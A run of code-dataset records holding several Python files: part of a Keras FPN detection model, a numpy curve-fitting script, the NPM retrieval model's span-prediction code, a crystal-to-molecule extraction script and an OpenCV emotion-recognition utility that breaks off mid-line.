keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tf.float32)\r\n for w in self.keras_model.trainable_weights\r\n if 'gamma' not in w.name and 'beta' not in w.name]\r\n self.keras_model.add_loss(tf.add_n(reg_losses))\r\n\r\n # Compile\r\n self.keras_model.compile(\r\n optimizer=optimizer,\r\n loss=[None] * len(self.keras_model.outputs))\r\n\r\n # Add metrics for losses\r\n for name in loss_names:\r\n if name in self.keras_model.metrics_names:\r\n continue\r\n layer = self.keras_model.get_layer(name)\r\n self.keras_model.metrics_names.append(name)\r\n loss = (\r\n tf.reduce_mean(layer.output, keepdims=True)\r\n * self.config.LOSS_WEIGHTS.get(name, 1.))\r\n self.keras_model.metrics_tensors.append(loss)\r\n\r\n def load_weights(self, filepath, by_name=False, exclude=None):\r\n \"\"\"Modified version of the corresponding Keras function with\r\n the addition of multi-GPU support and the ability to exclude\r\n some layers from loading.\r\n exclude: list of layer names to exclude\r\n \"\"\"\r\n import h5py\r\n # Conditional import to support versions of Keras before 2.2\r\n # TODO: remove in about 6 months (end of 2018)\r\n try:\r\n from keras.engine import saving\r\n except ImportError:\r\n # Keras before 2.2 used the 'topology' namespace.\r\n from keras.engine import topology as saving\r\n\r\n if exclude:\r\n by_name = True\r\n\r\n if h5py is None:\r\n raise ImportError('`load_weights` requires h5py.')\r\n f = h5py.File(filepath, mode='r')\r\n if 'layer_names' not in f.attrs and 'model_weights' in f:\r\n f = f['model_weights']\r\n\r\n # In multi-GPU training, we wrap the model. Get layers\r\n # of the inner model because they have the weights.\r\n keras_model = self.keras_model\r\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\r\n else keras_model.layers\r\n\r\n # Exclude some layers\r\n if exclude:\r\n layers = filter(lambda l: l.name not in exclude, layers)\r\n\r\n if by_name:\r\n saving.load_weights_from_hdf5_group_by_name(f, layers)\r\n else:\r\n saving.load_weights_from_hdf5_group(f, layers)\r\n if hasattr(f, 'close'):\r\n f.close()\r\n\r\n # Update the log directory\r\n self.set_log_dir(filepath)\r\n\r\n def detect(self, images, verbose=0):\r\n \"\"\"Runs the detection pipeline.\r\n images: List of images, potentially of different sizes.\r\n\r\n Returns a list of dicts, one dict per image. The dict contains:\r\n rois: [N, (y1, x1, y2, x2)] detection bounding boxes\r\n class_ids: [N] int class IDs\r\n scores: [N] float probability scores for the class IDs\r\n \"\"\"\r\n assert self.mode == \"inference\", \"Create model in inference mode.\"\r\n assert len(images) == self.config.BATCH_SIZE, \"len(images) must be equal to BATCH_SIZE\"\r\n\r\n if verbose:\r\n log(\"Processing {} images\".format(len(images)))\r\n for image in images:\r\n log(\"image\", image)\r\n\r\n # Mold inputs to format expected by the neural network\r\n molded_images, image_metas, windows = self.mold_inputs(images)\r\n\r\n # Validate image sizes\r\n # All images in a batch MUST be of the same size\r\n image_shape = molded_images[0].shape\r\n for g in molded_images[1:]:\r\n assert g.shape == image_shape, \\\r\n \"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes.\"\r\n\r\n # Anchors\r\n anchors = self.get_anchors(image_shape)\r\n # Duplicate across the batch dimension because Keras requires it\r\n # TODO: can this be optimized to avoid duplicating the anchors?\r\n anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)\r\n\r\n if verbose:\r\n log(\"molded_images\", molded_images)\r\n log(\"image_metas\", image_metas)\r\n log(\"anchors\", anchors)\r\n # Run object detection\r\n detections, fpn_class, fpn_bbox, rpn_rois, rpn_class, rpn_bbox, P2, P3, P4, P5 = \\\r\n self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)\r\n # Process detections\r\n results = []\r\n for i, image in enumerate(images):\r\n final_rois, final_class_ids, final_scores = \\\r\n self.unmold_detections(detections[i],\r\n image.shape, molded_images[i].shape,\r\n windows[i])\r\n final_P2 = P2[i]\r\n final_P3 = P3[i]\r\n final_P4 = P4[i]\r\n final_P5 = P5[i]\r\n results.append({\r\n \"rois\": final_rois,\r\n \"class_ids\": final_class_ids,\r\n \"scores\": final_scores,\r\n \"P2\": final_P2,\r\n \"P3\": final_P3,\r\n \"P4\": final_P4,\r\n \"P5\": final_P5,\r\n })\r\n # results.append({\r\n # \"detections\": detections[i],\r\n # \"fpn_class\": fpn_class[i],\r\n # \"fpn_bbox\": fpn_bbox[i],\r\n # \"rpn_rois\": rpn_rois[i],\r\n # \"rpn_class\": rpn_class[i],\r\n # \"rpn_bbox\": rpn_bbox[i],\r\n # })\r\n\r\n return results\r\n\r\n def mold_inputs(self, images):\r\n \"\"\"Takes a list of images and modifies them to the format expected\r\n as an input to the neural network.\r\n images: List of image matrices [height,width,depth]. Images can have\r\n different sizes.\r\n\r\n Returns 3 Numpy matrices:\r\n molded_images: [N, h, w, 3]. Images resized and normalized.\r\n image_metas: [N, length of meta data]. Details about each image.\r\n windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the\r\n original image (padding excluded).\r\n \"\"\"\r\n molded_images = []\r\n image_metas = []\r\n windows = []\r\n for image in images:\r\n # Resize image\r\n # TODO: move resizing to mold_image()\r\n molded_image, window, scale, padding, crop = utils.resize_image(\r\n image,\r\n min_dim=self.config.IMAGE_MIN_DIM,\r\n min_scale=self.config.IMAGE_MIN_SCALE,\r\n max_dim=self.config.IMAGE_MAX_DIM,\r\n mode=self.config.IMAGE_RESIZE_MODE)\r\n molded_image = model_utils.mold_image(molded_image, self.config)\r\n # Build image_meta\r\n image_meta = model_utils.compose_image_meta(\r\n 0, image.shape, molded_image.shape, window, scale,\r\n np.zeros([self.config.NUM_CLASSES], dtype=np.int32))\r\n # Append\r\n molded_images.append(molded_image)\r\n windows.append(window)\r\n image_metas.append(image_meta)\r\n # Pack into arrays\r\n molded_images = np.stack(molded_images)\r\n image_metas = np.stack(image_metas)\r\n windows = np.stack(windows)\r\n return molded_images, image_metas, windows\r\n\r\n def unmold_detections(self, detections, original_image_shape, image_shape, window):\r\n \"\"\"Reformats the detections of one image from the format of the neural\r\n network output to a format suitable for use in the rest of the\r\n application.\r\n\r\n detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates\r\n original_image_shape: [H, W, C] Original image shape before resizing\r\n image_shape: [H, W, C] Shape of the image after resizing and padding\r\n window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real\r\n image is excluding the padding.\r\n\r\n Returns:\r\n boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels\r\n class_ids: [N] Integer class IDs for each bounding box\r\n scores: [N] Float probability scores of the class_id\r\n \"\"\"\r\n print(\"\\n\\ndetections: \", detections.shape)\r\n\r\n # How many detections do we have?\r\n # Detections array is padded with zeros. Find the first class_id == 0.\r\n zero_ix = np.where(detections[:, 4] == 0)[0]\r\n N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0]\r\n\r\n print(\"\\n\\nN: \", N)\r\n\r\n # Extract boxes, class_ids, scores\r\n boxes = detections[:N, :4]\r\n class_ids = detections[:N, 4].astype(np.int32)\r\n scores = detections[:N, 5]\r\n\r\n # Translate normalized coordinates in the resized image to pixel\r\n # coordinates in the original image before resizing\r\n window = utils.norm_boxes(window, image_shape[:2])\r\n wy1, wx1, wy2, wx2 = window\r\n shift = np.array([wy1, wx1, wy1, wx1])\r\n wh = wy2 - wy1 # window height\r\n ww = wx2 - wx1 # window width\r\n scale = np.array([wh, ww, wh, ww])\r\n # Convert boxes to normalized coordinates on the window\r\n boxes = np.divide(boxes - shift, scale)\r\n # Convert boxes to pixel coordinates on the original image\r\n boxes = utils.denorm_boxes(boxes, original_image_shape[:2])\r\n\r\n # Filter out detections with zero area. Happens in early training when\r\n # network weights are still random\r\n exclude_ix = np.where(\r\n (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]\r\n if exclude_ix.shape[0] > 0:\r\n boxes = np.delete(boxes, exclude_ix, axis=0)\r\n class_ids = np.delete(class_ids, exclude_ix, axis=0)\r\n scores = np.delete(scores, exclude_ix, axis=0)\r\n # N = class_ids.shape[0]\r\n\r\n return boxes, class_ids, scores\r\n","repo_name":"SirisAvishek/Attention_Shift_Ranks","sub_path":"Attention_Shift_Saliency_Rank/fpn_network/FPN.py","file_name":"FPN.py","file_ext":"py","file_size_in_byte":32583,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"43423856315","text":"# encoding: utf-8\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nx_arr = np.array([0, 1, 2, 3])\r\ny_arr = np.array([2, 1, 1, 2])\r\n#\r\n# print(\"x_arr**4={}\".format((x_arr**4).sum()))\r\n# print(\"x_arr**3={}\".format((x_arr**3).sum()))\r\n# print(\"x_arr**2={}\".format((x_arr**2).sum()))\r\n# print(\"x_arr={}\".format(x_arr.sum()))\r\n# print(\"\\n\")\r\n# print(\"y_arr={}\".format(y_arr.sum()))\r\n# print(\"xy={}\".format((x_arr * y_arr).sum()))\r\n# print(\"x^2y={}\".format(((x_arr**2) * y_arr).sum()))\r\n\r\n\r\narr_a = [[196, 72, 28],\r\n [72, 28, 12],\r\n [14, 6, 4]]\r\nmatrix_b = np.array([[48], [18], [6]])\r\nmatrix_A = np.array(arr_a)\r\nmatrix_abc = np.linalg.inv(matrix_A).dot(matrix_b)\r\n\r\nprint(matrix_abc)\r\nmatrix_t = np.transpose(matrix_abc).round(2)\r\nprint(matrix_t)\r\n\r\nX = np.linspace(-0.5, 3.5, num=1000)\r\nY = matrix_t[0][0]*(X**2) + matrix_t[0][1]*X + matrix_t[0][2]\r\n\r\nplt.figure()\r\nplt.title(\"$f(x)=({})x^2+({})x+({})$\".format(matrix_t[0][0], matrix_t[0][1], matrix_t[0][2]))\r\nplt.scatter(x_arr, y_arr, c='r')\r\nplt.plot(X, Y)\r\nplt.show()\r\n","repo_name":"niko-liu/python_play","sub_path":"linear/approximate_line.py","file_name":"approximate_line.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2052264151","text":"import torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport json\nimport math\nimport time\nimport numpy as np\nimport os\nimport pickle as pkl\nimport datetime\nimport re\nimport string\n\nfrom collections import defaultdict, Counter\nfrom scipy.special import softmax, log_softmax\n\nfrom npm.npm_single import NPMSingle\nfrom task.utils_eval import normalize_answer\n\ntry:\n from termcolor import colored\nexcept:\n pass\nimport torch.nn.functional as F\n\nclass NPM(NPMSingle):\n def get_all_scores(self, queries):\n start_query, end_query = queries\n start_scores, start_indices, start_knn_ids = super().get_all_scores(start_query)\n end_scores, end_indices, end_knn_ids = super().get_all_scores(end_query)\n\n all_indices = np.concatenate([start_indices, end_indices], -1)\n knn_ids = [start_knn_ids[0] + end_knn_ids[0]]\n all_scores = np.concatenate([start_scores, end_scores], -1)\n all_scores /= self.temperature\n assert len(knn_ids)==len(all_scores)==1 and len(knn_ids[0])==len(all_scores[0])\n\n return all_scores, all_indices, knn_ids\n\n def predict_span(self, query_text, ngram_max, valid_func=None,\n alphas=[0.0], is_question=False, return_metadata=False):\n\n # first, obtain query emb\n inputs = self.model.tokenizer(query_text)\n input_ids = inputs[\"input_ids\"]\n assert self.model.tokenizer.mask_token_id in input_ids\n idx = input_ids.index(self.model.tokenizer.mask_token_id)\n with torch.no_grad():\n input_tensor = torch.LongTensor([input_ids]).cuda()\n _, (start_query_tensor, end_query_tensor) = self.model.forward(input_tensor, idx)\n start_query = start_query_tensor.detach().cpu().numpy()\n end_query = end_query_tensor.detach().cpu().numpy()\n\n pos2ngram = {}\n predictions = {}\n\n # this is a utility function that finds all possible spans\n # composed with the top k start indices and end indices\n def get_candidates(start_indices, end_indices):\n consider_string_boundary = self.dstore.consider_string_boundary\n\n start_triples = self.dstore._get_token_position(start_indices.tolist(),\n ngram_after=ngram_max)\n end_triples = self.dstore._get_token_position(end_indices.tolist(),\n ngram_before=ngram_max)\n\n all_start_indices = set()\n all_end_indices = set()\n all_start_and_end = set()\n\n for (block_idx, token_indices, vocabs), start_token_idx in zip(start_triples[0], start_indices[0]):\n\n if consider_string_boundary and token_indices[0] not in self.dstore.orig_block_idx_to_valid_start[block_idx]:\n continue\n all_start_indices.add(start_token_idx)\n end_token_idx = start_token_idx\n\n for j in range(len(token_indices)):\n\n is_valid_start = token_indices[j] in self.dstore.orig_block_idx_to_valid_start[block_idx]\n is_valid_end = token_indices[j] in self.dstore.orig_block_idx_to_valid_end[block_idx]\n\n if self.dstore.embs_consider_boundary and not (is_valid_start or is_valid_end):\n continue\n\n if (not consider_string_boundary) or is_valid_end:\n ngram = vocabs[:j+1]\n ngram_pos = (start_token_idx, end_token_idx)\n # ngram_pos = (block_idx, token_indices[0], token_indices[0]+j)\n # assert len(ngram)==ngram_pos[1][1]-ngram_pos[1][0]+1\n if valid_func is None or valid_func(ngram):\n if ngram_pos in pos2ngram:\n assert pos2ngram[ngram_pos]==ngram\n else:\n pos2ngram[ngram_pos] = ngram\n all_end_indices.add(end_token_idx)\n all_start_and_end.add(ngram_pos)\n\n end_token_idx += 1\n\n for (block_idx, token_indices, vocabs), end_token_idx in zip(end_triples[0], end_indices[0]):\n\n if consider_string_boundary and token_indices[-1] not in self.dstore.orig_block_idx_to_valid_end[block_idx]:\n continue\n all_end_indices.add(end_token_idx)\n start_token_idx = end_token_idx\n\n for j in range(len(token_indices)):\n\n is_valid_start = token_indices[-j-1] in self.dstore.orig_block_idx_to_valid_start[block_idx]\n is_valid_end = token_indices[-j-1] in self.dstore.orig_block_idx_to_valid_end[block_idx]\n\n if self.dstore.embs_consider_boundary and not (is_valid_start or is_valid_end):\n continue\n\n if (not consider_string_boundary) or is_valid_start:\n ngram = vocabs[-j-1:]\n ngram_pos = (start_token_idx, end_token_idx)\n # ngram_pos = (block_idx, token_indices[-1]-j, token_indices[-1])\n # assert len(ngram)==ngram_pos[1][1]-ngram_pos[1][0]+1\n if valid_func is None or valid_func(ngram):\n if ngram_pos in pos2ngram:\n assert pos2ngram[ngram_pos]==ngram\n else:\n pos2ngram[ngram_pos] = ngram\n all_start_indices.add(start_token_idx)\n all_start_and_end.add(ngram_pos)\n\n start_token_idx -= 1\n\n return all_start_indices, all_end_indices, all_start_and_end\n\n def get_scores(start_indices, end_indices):\n x = self.dstore.get_embs(start_indices)\n x = torch.from_numpy(x).cuda()\n start_scores = self.get_scores(start_query_tensor, x)[0]\n start_scores = start_scores.detach().cpu().numpy()\n\n x = self.dstore.get_embs(end_indices)\n x = torch.from_numpy(x).cuda()\n end_scores = self.get_scores(end_query_tensor, x)[0]\n end_scores = end_scores.detach().cpu().numpy()\n\n return start_scores, end_scores\n\n # main code starts from here\n if self.dstore.restricted:\n # find passaages to restricted\n if query_text in self.dstore.restricted_dict:\n block_ids = self.dstore.restricted_dict[query_text]\n else:\n block_ids = self.dstore.searcher.search(query_text, is_question=is_question)\n self.dstore.restricted_dict[query_text] = block_ids\n\n valid_idxs = []\n for block_id in block_ids:\n start, end = self.dstore.orig_block_idx_to_emb_token_idx[block_id:block_id+2]\n valid_idxs += list(range(start, end))\n start_indices = np.array([valid_idxs])\n end_indices = np.array([valid_idxs])\n\n else:\n _, start_indices = self.dstore.search(start_query, k=self.k)\n _, end_indices = self.dstore.search(end_query, k=self.k)\n\n if start_indices.shape[1]==end_indices.shape[1]==0:\n for alpha in alphas:\n predictions[\"a={}\".format(alpha)] = None\n return predictions\n\n if self.dstore.restricted:\n start_scores, end_scores = get_scores(start_indices, end_indices)\n _, _, all_start_and_end = get_candidates(start_indices, end_indices)\n\n all_start_indices = start_indices[0].tolist()\n all_end_indices = end_indices[0].tolist()\n all_start_scores = start_scores\n all_end_scores = end_scores\n\n else:\n all_start_indices, all_end_indices, all_start_and_end = get_candidates(start_indices, end_indices)\n\n all_start_indices = sorted(all_start_indices)\n all_end_indices = sorted(all_end_indices)\n\n all_start_scores, all_end_scores = get_scores(all_start_indices, all_end_indices)\n\n all_start_scores = softmax(all_start_scores / self.temperature, -1)\n all_end_scores = softmax(all_end_scores / self.temperature, -1)\n\n idx2start_score = {start_token_idx: score for start_token_idx, score\n in zip(all_start_indices, all_start_scores)}\n idx2end_score = {end_token_idx: score for end_token_idx, score\n in zip(all_end_indices, all_end_scores)}\n\n pos2score = {}\n ngram2score = defaultdict(list)\n\n # now, assign scores to possible ngrams\n for (start, end) in all_start_and_end:\n assert start in idx2start_score\n assert end in idx2end_score\n score = idx2start_score[start] + idx2end_score[end]\n\n pos2score[(start, end)] = score\n ngram2score[tuple(pos2ngram[(start, end)])].append(score)\n\n if len(pos2score)==len(ngram2score)==0:\n for alpha in alphas:\n predictions[\"a={}\".format(alpha)] = None\n return predictions\n\n assert len(pos2score)>0 and len(ngram2score)>0\n\n for alpha in alphas:\n def key_func(x, alpha=alpha):\n return -np.sum(x[1]) * np.power(len(x[0]), alpha)\n\n top1_ngram_score_pair = min(ngram2score.items(), key=key_func)\n top1_ngram = list(top1_ngram_score_pair[0])\n\n predictions[\"a={}\".format(alpha)] = top1_ngram\n\n if return_metadata:\n metadata = {\"input\": query_text}\n if self.dstore.restricted:\n metadata[\"blocks\"] = [self.decode(self.dstore.input_ids[block_id]) for block_id in block_ids]\n\n metadata[\"pos2score\"] = pos2score\n metadata[\"pos2ngram\"] = pos2ngram\n metadata[\"ngram2score\"] = ngram2score\n\n predicted_ngram = predictions[\"a=0.0\"]\n metadata[\"predicted\"] = self.decode(predicted_ngram)\n predicted_spans = []\n for pos, ngram in pos2ngram.items():\n if ngram==predicted_ngram:\n\n block_id_s = self.dstore.token_idx_to_block_idx[pos[0]]\n local_id_s = self.dstore.token_idx_to_local_idx[pos[0]]\n block_id_e = self.dstore.token_idx_to_block_idx[pos[1]]\n local_id_e = self.dstore.token_idx_to_local_idx[pos[1]]\n assert block_id_s==block_id_e\n\n input_ids = self.dstore.input_ids[block_id_s]\n decoded = self.decode(input_ids[:local_id_s]) + \\\n colored(self.decode(input_ids[local_id_s:local_id_e+1]), \"red\") + \\\n self.decode(input_ids[local_id_e+1:])\n\n predicted_spans.append((decoded, pos2score[pos]))\n\n metadata[\"predicted_spans\"] = sorted(predicted_spans, key=lambda x: -x[1])\n return predictions, metadata\n\n return predictions\n\n def get_query(self, input_text):\n inputs = self.model.tokenizer(input_text)\n input_ids = inputs[\"input_ids\"]\n assert self.model.tokenizer.mask_token_id in input_ids\n idx = input_ids.index(self.model.tokenizer.mask_token_id)\n with torch.no_grad():\n input_tensor = torch.LongTensor([input_ids]).cuda()\n _, query = self.model.forward(input_tensor, idx)\n return query\n\n def evaluate_open(self, task):\n all_predictions = []\n mask = self.get_stopword_mask()\n do_restricted = self.dstore is not None and self.dstore.restricted is not None\n\n def valid_func(tokens):\n return np.sum(mask[tokens])==0\n\n if \"translation\" in str(task):\n alphas = [0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0]\n ngram_max = 20\n else:\n alphas = [0.0, 0.5, 1.0]\n ngram_max = 10\n\n for ex in tqdm(task.examples):\n dic = self.predict_span(\n ex[\"input\"],\n ngram_max=ngram_max,\n valid_func=valid_func,\n alphas=alphas,\n is_question=task.is_question,\n )\n dic = {k: '' if v is None else self.decode(v) for k, v in dic.items()}\n all_predictions.append(dic)\n\n # compute accuracy\n references = [[normalize_answer(answer) for answer in ex[\"answers\"]] for ex in task.examples]\n for k in all_predictions[0]:\n predictions = [normalize_answer(p[k]) for p in all_predictions]\n accs = [prediction in reference for prediction, reference in zip(predictions, references)]\n\n if task.ngrams is not None:\n accs_dict = defaultdict(list)\n for acc, ngram in zip(accs, task.ngrams):\n accs_dict[ngram].append(acc)\n acc = np.mean([np.mean(v) for k, v in accs_dict.items()])\n print (\"\\t%s\\tMacro EM=%.1f%%\" % (k, 100*acc))\n else:\n acc = np.mean(accs)\n print (\"\\t%s\\tEM=%.1f%%\" % (k, 100*acc))\n\n return all_predictions\n\n\n","repo_name":"facebookresearch/NPM","sub_path":"npm/npm.py","file_name":"npm.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"53"} +{"seq_id":"13512815514","text":"from dbaAutomator.functions import *\nfrom dbaAutomator.ref import *\nfrom ase.io import read\nfrom pymatgen.io.ase import AseAtomsAdaptor\nfrom pymatgen import Molecule\nimport os\nimport numpy as np\n\ninpath = \"./data/crystals\"\nnamelist = os.listdir(inpath)\noutpath = \"./data/singmol\"\n\n\nnocando = []\nfor name in namelist:\n structID = name[:-3]\n print(structID)\n struct = read(os.path.join(inpath, name))\n struct = AseAtomsAdaptor.get_structure(struct)\n struct.make_supercell([4, 5, 7])\n bondDict = getBondDict(struct, bondCutoff)\n print(bondDict)\n try:\n singleMol = getCentralSingleMol(struct, bondDict)\n #singleMol.to(filename=outpath+\"/\"+structID+\".xyz\")\n mol = Molecule([], [])\n for site in singleMol.items():\n mol.append(str(site[1].specie), site[1].coords)\n mol.to(filename=outpath+\"/\"+structID+\"xyz\")\n except:\n nocando.append(structID)\n\nprint(nocando)\nnocando = np.array(nocando)\nnp.savetxt('nocandolist.csv', nocando, delimiter=' ', fmt='%s')\n","repo_name":"BLABABA/scripts","sub_path":"struct/extractSingleMol.py","file_name":"extractSingleMol.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29179364712","text":"import cv2 as cv\r\nimport numpy as np\r\nfrom keras.models import load_model\r\nimport face_recognition\r\n\r\n\r\n############################################\r\n# 工具类\r\n# func 1: get_faces_from_image(image)\r\n# 【功能】给出图片,返回原图中的人脸区域\r\n# func 2: get_emotion_from_roi(roi_gray)\r\n# 【功能】将处理好的48*48的灰度面部图交给训练好的情绪分类器处理,得到情绪类别\r\n# func 3: draw_faces_on_image(image, faces, emo_freq)\r\n# 【功能】在原图上框出得到的脸部区域,并标注其情绪种类\r\n# func 4: rotate_bound(image, src_h, src_w, angle, i)\r\n# 【功能】按一定角度顺时针旋转图片,并保证图片完整,不被裁剪\r\n# func 5: draw_allround_faces_on_image(image)\r\n# 【功能】360度旋转图片,每旋转一定角度识别一次+画一次\r\n# func 6: get_most_freq_emo(emo_freq)\r\n# 【功能】 得到情绪统计中出现次数最多的情绪\r\n# func 7: generate_frames(camera)\r\n# 【功能】前端摄像头实时识别\r\n############################################\r\n\r\n\r\n# description: 给出图片,返回原图中的人脸区域\r\n# params: 图片\r\n# returns: 人脸区域 (一个元素为(top, right, bottom, left)元组的list)\r\ndef get_faces_from_image(image):\r\n # 模型选择一:用OpenCV人脸识别分类器\r\n # 将原图转化为灰度图\r\n # gray_image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n # # 得到OpenCV人脸识别的分类器\r\n # face_classifier = cv.CascadeClassifier('pythonProject_copy/haarcascade_frontalface_alt2.xml')\r\n # # 检测人脸\r\n # faces = face_classifier.detectMultiScale(image, scaleFactor=1.3, minNeighbors=5)\r\n\r\n # 模型选择二:使用face_recognition模块\r\n face_locations = face_recognition.face_locations(image)\r\n return face_locations\r\n\r\n\r\n# description: 将处理好的48*48的灰度面部图交给训练好的情绪分类器处理,得到情绪类别\r\n# params: 48*48的灰度图\r\n# returns: 情绪对应的名称\r\ndef get_emotion_from_roi(roi_gray):\r\n # 加载情绪分类器\r\n classifier = load_model('pythonProject_copy/EmotionDetectionModel.h5')\r\n # 给出情绪标签对应的文字\r\n class_labels = ['Angry', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\r\n # 若roi_gray全0,即全黑,则表示该区域中无脸部图像\r\n if np.sum([roi_gray]) != 0:\r\n roi = roi_gray.astype('float') / 255.0\r\n roi = np.array(roi)\r\n roi = np.expand_dims(roi, axis=0)\r\n # 开始预测\r\n prediction = classifier.predict(roi)[0]\r\n label = class_labels[prediction.argmax()]\r\n return label\r\n else:\r\n return 'No Face Found'\r\n\r\n\r\n# description: 在原图上框出得到的脸部区域,并标注其情绪种类\r\n# params: 图片,脸部区域,统计的情绪频率\r\n# returns: 无\r\ndef draw_faces_on_image(image, faces, emo_freq):\r\n for (top, right, bottom, left) in faces:\r\n # 用cv画出矩形范围\r\n cv.rectangle(image, (left, top), (right, bottom), color=(255, 0, 0), thickness=2)\r\n # 将该范围作为roi区域,进行情绪识别\r\n roi = image[top:bottom, left:right]\r\n # 转换为灰度图\r\n roi_gray = cv.cvtColor(roi, cv.COLOR_BGR2GRAY)\r\n # 统一大小\r\n roi_gray = cv.resize(roi_gray, (48, 48), interpolation=cv.INTER_AREA)\r\n # 使用情绪分类器进行识别,并将得到的情绪名称标注在图片上\r\n label = get_emotion_from_roi(roi_gray)\r\n label_position = (left, top)\r\n cv.putText(image, label, label_position, cv.FONT_HERSHEY_SIMPLEX, fontScale=1, color=(0, 255, 0),\r\n thickness=2)\r\n # 对应情绪计数+1\r\n emo_freq[label] += 1\r\n\r\n\r\n# description: 按一定角度旋转图片,并保证图片完整,不被裁剪\r\n# params: 图片,需要旋转的角度\r\n# returns: 旋转后的图片\r\ndef rotate_bound(image, src_h, src_w, angle, i):\r\n # 获得图片的高、宽,中心坐标\r\n actual_h, actual_w = image.shape[:2]\r\n (center_x, center_y) = (actual_w // 2, actual_h // 2)\r\n if i == 0:\r\n return image\r\n else:\r\n # 得到旋转矩阵(为使其顺时针选择,将角度设置为负),缩放因子=1.0\r\n rotation_matrix = cv.getRotationMatrix2D(center=(center_x, center_y), angle=-angle, scale=1.0)\r\n # 用于计算实际画布大小的旋转矩阵:旋转角度是对于原图而言的(否则图片尺寸会越来越大)\r\n fake_matrix = cv.getRotationMatrix2D(center=(center_x, center_y), angle=-angle * i, scale=1.0)\r\n cos = np.abs(fake_matrix[0, 0])\r\n sin = np.abs(fake_matrix[0, 1])\r\n # 为保证选择后的图片完整,需要扩大画布,新画布的维度值如下\r\n new_width = int((src_h * sin) + (src_w * cos))\r\n new_height = int((src_h * cos) + (src_w * sin))\r\n # 平移图像→平移中心点\r\n rotation_matrix[0, 2] += (new_width / 2) - center_x\r\n rotation_matrix[1, 2] += (new_height / 2) - center_y\r\n\r\n rotated_image = cv.warpAffine(image, rotation_matrix, (new_width, new_height), borderValue=(0, 0, 0))\r\n return rotated_image\r\n\r\n\r\n# description: 360度旋转图片,每45度识别一次+画一次\r\n# params: 图片\r\n# returns: 360度识别人脸并标注情绪的标注图,以及出现情绪频率的dict\r\ndef draw_allround_faces_on_image(image):\r\n emo_freq = {\r\n 'Angry': 0, 'Fear': 0, 'Happy': 0, 'Neutral': 0, 'Sad': 0, 'Surprise': 0\r\n }\r\n # 旋转角度和总共旋转的次数\r\n ANGLE = 45\r\n TIMES = 360 // ANGLE\r\n # 原图的宽高\r\n (IMG_H, IMG_W) = image.shape[:2]\r\n # 已标注的面部列表\r\n drawn_faces_encoding = []\r\n for i in np.arange(TIMES):\r\n i_right_faces = []\r\n image = rotate_bound(image, IMG_H, IMG_W, ANGLE, i)\r\n i_faces_loc = get_faces_from_image(image)\r\n for (top, right, bottom, left) in i_faces_loc:\r\n # 比较图片相似度\r\n face_img_encoding = face_recognition.face_encodings(image[top:bottom, left:right, :], known_face_locations=[\r\n (0, right - left, bottom - top, 0)])\r\n if len(face_img_encoding) != 0:\r\n is_same_face = face_recognition.compare_faces(drawn_faces_encoding, face_img_encoding[0], tolerance=0.5)\r\n # 若与已标注的人脸集drawn_faces_encoding中某张人脸相同,则不再标注当前的face_img,否则重复\r\n if ~np.array(is_same_face).any():\r\n i_right_faces.append((top, right, bottom, left))\r\n drawn_faces_encoding.append(face_img_encoding[0])\r\n draw_faces_on_image(image, i_right_faces, emo_freq)\r\n # # 展示旋转的过程\r\n # cv.imshow('rotated image:', image)\r\n # cv.waitKey()\r\n # 最后旋转一次,摆正原图q\r\n image = rotate_bound(image, IMG_H, IMG_W, ANGLE, TIMES)\r\n print('The image is drawn')\r\n return image, emo_freq\r\n\r\n\r\n# description: 得到情绪统计中出现次数最多的情绪\r\n# params: 情绪-出现次数 dict\r\n# return: 出现次数最高的情绪的文本\r\ndef get_most_freq_emo(emo_freq):\r\n find_max = max(emo_freq, key=emo_freq.get)\r\n return find_max\r\n\r\n\r\n# description: 前端摄像头实时识别\r\ndef generate_frames(camera):\r\n # 加载人脸识别和情绪识别模型\r\n face_classifier = cv.CascadeClassifier('haarcascade_frontalface_alt2.xml')\r\n classifier = load_model('EmotionDetectionModel.h5')\r\n class_labels = ['Angry', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\r\n while True:\r\n ## read the camera frame\r\n success, frame = camera.read()\r\n # 识别图片,并标注情绪\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\r\n\r\n for (x, y, w, h) in faces:\r\n cv.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n roi_gray = gray[y:y + h, x:x + w]\r\n roi_gray = cv.resize(roi_gray, (48, 48), interpolation=cv.INTER_AREA)\r\n\r\n if np.sum([roi_gray]) != 0:\r\n roi = roi_gray.astype('float') / 255.0\r\n roi = np.array(roi)\r\n roi = np.expand_dims(roi, axis=0)\r\n\r\n preds = classifier.predict(roi)[0]\r\n label = class_labels[preds.argmax()]\r\n label_position = (x, y)\r\n cv.putText(frame, label, label_position, cv.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 3)\r\n else:\r\n cv.putText(frame, 'No Face Found', (20, 20), cv.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 3)\r\n\r\n if not success:\r\n break\r\n else:\r\n ret, buffer = cv.imencode('.jpg', frame)\r\n frame = 